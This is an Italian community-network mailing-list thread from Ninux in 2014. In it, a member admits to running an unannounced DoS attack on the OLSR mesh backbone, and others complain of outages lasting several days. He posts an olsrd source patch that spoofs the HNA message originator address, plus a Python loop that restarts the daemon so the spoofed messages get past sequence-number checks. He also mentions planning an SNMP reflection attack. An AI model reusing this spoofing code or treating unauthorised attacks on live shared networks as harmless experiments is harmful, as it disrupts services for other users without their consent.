[Ninux-Wireless] [ninux-roma] Attacchi DoS in olsrd Was: "Malfunzionamento" a Gallia

Alessandro (aka ArkaNet) arkantiko a gmail.com
Dom 25 Maggio 2014 12:16:07 CEST 

Hola!

Fish hai ragione dobbiamo fare qualcosa!!
Sicuramente ZioProTo ci sta facendo capire quanto sia semplice per un
macellaio utilizzare un coltello.
Cosa dovremmo aver acquisito alla luce di ciò?
Che se arrivasse un assassino e si impadronisse del coltello, farebbe una
strage!

Ora, senza troppe metafore, ci siamo resi conto che se qualcuno ha voglia
(e capacità) può farci male.
I provvedimenti dobbiamo prenderli per evitare minacce *esterne*, e che
sicuramente non avvisino prima di agire!
Dire che Saverio sia una minaccia sarebbe come entrare in chiesa e
bestemmiare, insomma ... non si fa ;)

Se vogliamo una rete 'pronta' e con una certa resilienza, dobbiamo
costruircela. A volte non basta fare il link migliore per poter dire di
avere una struttura solida.
Abbiamo anche bisogno di un motore che spinga!

E poi ricordiamoci che ninux fa rima con relax!

Io direi "fortuna che era un'azione controllata!" (e fatta apposta per
essere controllabile)

Bella && Buona Domenica @tutti

*--
Arka*



Il giorno 25 maggio 2014 09:37, Andrea Pescetelli <
andrea.pescetelli a gmail.com> ha scritto:

> Ciao
> Vorrei chiedere di prendere provvedimenti seri a seguito di questi eventi
> e comportamenti che da una settimana stanno invalidando sia il rispetto
> reciproco sia il buon finzionamento della rete stessa da parte di Saverio
> Proto.
> Il 25/mag/2014 09:07 "Alessandro Gnagni" <alessandro a gnagni.it> ha
> scritto:
>
>> Non è qualche ora. Va avanti da giovedì mattina.
>> Ma almeno avvisare? Uno non può perdere tempo appresso a ste cose...
>> Jabber è stato ko da giovedì per sta cosa.
>> Il 25/mag/2014 01:03 "Saverio Proto" <zioproto a gmail.com> ha scritto:
>>
>>> Ciao,
>>>
>>> Metto in Cc: anche wireless a ml.ninux.org perché questa email contiene
>>> informazioni tecniche interessanti.
>>>
>>> bravi, avete risolto il problema in fretta :) Ho volutamente provato
>>> un attacco DoS sul backbone per capire che effetto poteva avere.
>>>
>>> ecco la patch di olsrd con cui generavo l'attacco DoS
>>>
>>> diff --git a/src/build_msg.c b/src/build_msg.c
>>> index 109f955..e252981 100644
>>> --- a/src/build_msg.c
>>> +++ b/src/build_msg.c
>>> @@ -1021,7 +1021,11 @@ serialize_hna4(struct interface *ifp)
>>>    m = (union olsr_message *)msg_buffer;
>>>
>>>    /* Fill header */
>>> -  m->v4.originator = olsr_cnf->main_addr.v4.s_addr;
>>> +  struct in_addr fakesource;
>>> +  fakesource.s_addr = 0;
>>> +  //inet_hton(2956867021,&fakesource);
>>> +  inet_aton("172.16.40.40",&fakesource);
>>> +  m->v4.originator = fakesource.s_addr;
>>>    m->v4.hopcnt = 0;
>>>    m->v4.ttl = MAX_TTL;
>>>    m->v4.olsr_msgtype = HNA_MESSAGE;
>>>
>>>
>>> una domanda,
>>>
>>> se avessi patchato anche:
>>>
>>> m->v4.hopcnt = XXX
>>>
>>> mettendo numeri casuali..
>>>
>>> sarebbe stato altrettanto facile capire chi è che iniettava questi
>>> messaggi ?
>>>
>>> mi sto divertendo parecchio con questi attacchi DoS, sono molto
>>> istruttivi. Per chi vuole giocare insieme a me a programmare in C
>>> possiamo approfondire il giovedi sera al Sans Papiers. (Il prossimo
>>> che vorrei provare è DrDoS su snmp).
>>>
>>> un problema di questo attacco sono cmq i sequence number. Per rendere
>>> l'attacco efficace ho dovuto far andare la mia instanza patchata di
>>> OLSR a singhiozzo:
>>>
>>> import os
>>> import time
>>>
>>> while True:
>>>         os.system("olsrd")
>>>         print "started\n"
>>>         time.sleep(120)
>>>         os.system("killall olsrd")
>>>         print "killed\n"
>>>         time.sleep(300)
>>>
>>> in quanto avevo bisogno che i miei sequence number dovevano sempre
>>> essere piu bassi di quelli del spoofato, altrimenti venivano scartati
>>> come out of sequence.
>>>
>>> vi va di scrivere insieme un articoletto per il blog ? Io scrivo la
>>> parte di come ti costruisce l'attacco e voi la parte di come avete
>>> fatto ad identificare il nodo spoofato ?
>>>
>>> ho staccatto il nodo attaccante, il gioco è finito :)
>>>
>>> ah... vi prego nessun malumore per qualche oretta di disservizi, this
>>> is Ninux. Si fanno queste cose perché ci si diverte insieme.
>>>
>>> ciao :)
>>>
>>> Saverio
>>>
>>> Il 24 maggio 2014 23:23, Andrea Pescetelli
>>> <andrea.pescetelli a gmail.com> ha scritto:
>>> > Saverio,
>>> > Abbiamo rilevato che dal nodo Gallia viene generato un messaggio olsr
>>> hna
>>> > con originator 172.16.40.40, validity time 570, hna 176.62.53.192/28
>>> > proveniente dal nodo in oggetto.
>>> >
>>> > Questo problema sta oscurando diversi servizi di ninux in farm
>>> appartenenti
>>> > a quella subnet.
>>> >
>>> > Abbiamo triangolato la posizione basandoci sugli hop count dei cammini
>>> > multipli.
>>> > puoi verificare?
>>> >
>>> > Grazie
>>> >
>>> > Fish, Hispanico, Halino
>>> > --
>>> > Andrea Pescetelli aka Fish
>>> > Skype: andrea5742
>>> > Ninux int: 5001/5002
>>> > Mobile: +39 3891156050
>>> >
>>> >
>>> >
>>> >
>>>
>>
>> _______________________________________________
>> Wireless mailing list
>> Wireless a ml.ninux.org
>> http://ml.ninux.org/mailman/listinfo/wireless
>>
>>
-------------- parte successiva --------------
Un allegato HTML è stato rimosso...
URL: <http://ml.ninux.org/pipermail/wireless/attachments/20140525/dc84b385/attachment-0001.html>

Maggiori informazioni sulla lista Wireless